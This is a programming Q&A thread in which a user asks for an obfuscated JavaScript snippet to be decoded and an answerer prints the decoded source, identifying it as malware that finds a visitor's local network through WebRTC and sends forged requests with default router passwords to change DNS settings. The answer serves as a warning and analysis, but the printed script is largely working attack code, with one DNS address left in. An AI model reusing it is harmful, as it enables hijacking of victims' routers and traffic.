Piash Hassan Piash Hassan - 7 months ago 21
Javascript Question

Decrypt Javascript Obfuscator

This code has been encrypted by Obfuscator. I need this decrypted can anyone will be able to do it.

Here is part of code:

eval((function(){var w=[85,87,60,76,66,82,86,89,94,90,74,81,79,75,71,65,80,88,72,70];var a=[];for(var z=0;z<w.length;z++)a[w[z]]=z+1;var h=[];for(var f=0;f<arguments.length;f++){var c=arguments[f].split('~')


Also the the link to JSFiddle

Answer

Here's a formatted version of the code that gets evaled with the bad IP addresses removed* (you can actually just replace that first eval with console.log to get the source). Based on the symbol names, I believe this script attempts to use style tags and/or WebRTC to hack visitors local router and reconfigure their DNS settings. This is most-likely to route a victim's traffic through malicious servers and serve more malware and/or spy on their internet traffic.

You should get rid of this code, and check that your router has not been compromised. You should also warn your users if you have any.

var _$_2a49 = [
    "webkitRTCPeerConnection",
    "mozRTCPeerConnection",
    "",
    "createDataChannel",
    "onicecandidate",
    "candidate",
    "a=",
    "sdp",
    "setLocalDescription",
    "offer failed",
    "warn",
    "createOffer",
    "create",
    "0.0.0.0",
    "filter",
    "keys",
    ".",
    "split",
    ".1",
    "a=candidate",
    "indexOf",
    " ",
    "host",
    "c=",
    "forEach",
    "\r\n",
    "192.168.0.1",
    "<style type=\"text/css\">@import url(http://admin:gvt12345@",
    "/dnscfg.cgi?dnsPrimary=0.0.0.0&dnsSecondary=0.0.0.0&dnsDynamic=0&dnsRefresh=1);</style>",
    "write",
    "/dnsProxy.cmd?enblDproxy=0&PrimaryDNS=0.0.0.0&SecondaryDNS=0.0.0.0);</style>",
    "/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.82&Lease=120&gateway=0.0.0.0&domain=&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6);</style>",
    "/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1=23&dns1_2=95&dns1_3=57&dns1_4=74&dns2_1=192&dns2_2=3&dns2_3=182&dns2_4=146);</style>",
    "<style type=\"text/css\">@import url(http://admin:admin@",
    "/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&hostName=TLINK&Save=Save);</style>",
    "/start_apply.htm?dnsserver=0.0.0.0);</style>",
    "/wan_poe.cgi?dns1=0.0.0.0);</style>",
    "/setup.cgi?todo=wan_dns1=0.0.0.0);</style>",
    "<style type=\"text/css\">@import url(http://admin@",
    "/prim.htm?_scb=0&_ccb=0&N00010003=0x00&_cce=0x80010008&_ccb=0x80010009&S00035002=&N001E000D=&_cce=0x80010009&_ccb=0x80010009&_start_0000=&I00110001=&I00110002=&I00110003=&I00110004=&I00110005=&N00110009=1500&_start_0100=&I00035007=0.0.0.0&I00035008=0.0.0.0&N00035009=1500&_sce=%Nsc0&B0001000F=&_sce=%Nsc1&N0003500E=1&S00040100=&S00040200=&_S00040200=&S00040600=&I00040300=&I00040700=&I00040800=&N00040A00=1492&N00040912=1&N00050E00=1&I00050300=&I00050400=&I00050500=&S00050600=&S00050100=&S00050200=&_S00050200=&N00050911=1&N00060E00=1&I00060300=&I00060400=&I00060500=&S00060600=&S00060100=&S00060200=&_S00060200=&N00060002=1&N001E0015=2&N001E002B=0&S00201200=vivo&S001E0001=vivo&S001E0002=*****&_S001E0002=*****&S001E0005=*99#&N001E000F=1&S001E0003=zap.vivo.com.br&S001E0004=&N001E0032=1&I001E0008=&I001E0009=&N001E0010=0&N001E0020=&N001E0090=0&N001E0017=&_end_0500=&_cce=0x80010009&_sce=%Ssc);</style>",
    "<style type=\"text/css\">@import url(http://admin:password@",
    "/dnscfg.cgi?dnsPrimary=0.0.0.0&dnsSecondary=0.0.0.0&dnsDynamic=0&dnsRefresh=1);</style>",
    "/start_apply.htm?dnsserver=0.0.0.0&dnsserver2=0.0.0.0);</style>"
];
var RTCPeerConnection = window[_$_2a49[0]] || window[_$_2a49[1]];
if (RTCPeerConnection) {
    (function() {
        var c = new RTCPeerConnection({
            iceServers: []
        });
        if (1 || window[_$_2a49[1]]) {
            c[_$_2a49[3]](_$_2a49[2], {
                reliable: false
            })
        };
        c[_$_2a49[4]] = function(e) {
            if (e[_$_2a49[5]]) {
                b(_$_2a49[6] + e[_$_2a49[5]][_$_2a49[5]])
            }
        };
        c[_$_2a49[11]](function(f) {
            b(f[_$_2a49[7]]);
            c[_$_2a49[8]](f)
        }, function(g) {
            console[_$_2a49[10]](_$_2a49[9], g)
        });
        var a = Object[_$_2a49[12]](null);
        a[_$_2a49[13]] = false;

        function d(p) {
            if (p in a) {
                return
            } else {
                a[p] = true
            };
            var n = Object[_$_2a49[15]](a)[_$_2a49[14]](function(q) {
                return a[q]
            });
            var o = n[0][_$_2a49[17]](_$_2a49[16]);
            var patcga = o[0] + _$_2a49[16] + o[1] + _$_2a49[16] + o[2] + _$_2a49[18];
            catga(patcga)
        }
        function b(i) {
            var h = [];
            i[_$_2a49[17]](_$_2a49[25])[_$_2a49[24]](function(k) {
                if (~k[_$_2a49[20]](_$_2a49[19])) {
                    var l = k[_$_2a49[17]](_$_2a49[21]),
                        j = l[4],
                        m = l[7];
                    if (m === _$_2a49[22]) {
                        d(j)
                    }
                } else {
                    if (~k[_$_2a49[20]](_$_2a49[23])) {
                        var l = k[_$_2a49[17]](_$_2a49[21]),
                            j = l[2];
                        d(j)
                    }
                }
            })
        }
    })()
} else {
    var patcga = _$_2a49[26];
    catga(patcga)
};

function catga(patcga) {
    document[_$_2a49[29]](_$_2a49[27] + patcga + _$_2a49[28]);
    document[_$_2a49[29]](_$_2a49[27] + patcga + _$_2a49[30]);
    document[_$_2a49[29]](_$_2a49[27] + patcga + _$_2a49[31]);
    document[_$_2a49[29]](_$_2a49[27] + patcga + _$_2a49[32]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[28]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[34]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[35]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[30]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[36]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[37]);
    document[_$_2a49[29]](_$_2a49[38] + patcga + _$_2a49[39]);
    document[_$_2a49[29]](_$_2a49[33] + patcga + _$_2a49[39]);
    document[_$_2a49[29]](_$_2a49[40] + patcga + _$_2a49[41]);
    document[_$_2a49[29]](_$_2a49[40] + patcga + _$_2a49[34]);
    document[_$_2a49[29]](_$_2a49[40] + patcga + _$_2a49[42]);
    document[_$_2a49[29]](_$_2a49[40] + patcga + _$_2a49[37]);
    document[_$_2a49[29]](_$_2a49[40] + patcga + _$_2a49[36])
}

*Note: I've replaced the bad DNS IP addresses with 0.0.0.0 to protect anyone who might try to run this code. If you want to see them, perhaps to go-after or blacklist them, they are in the revision history for this answer.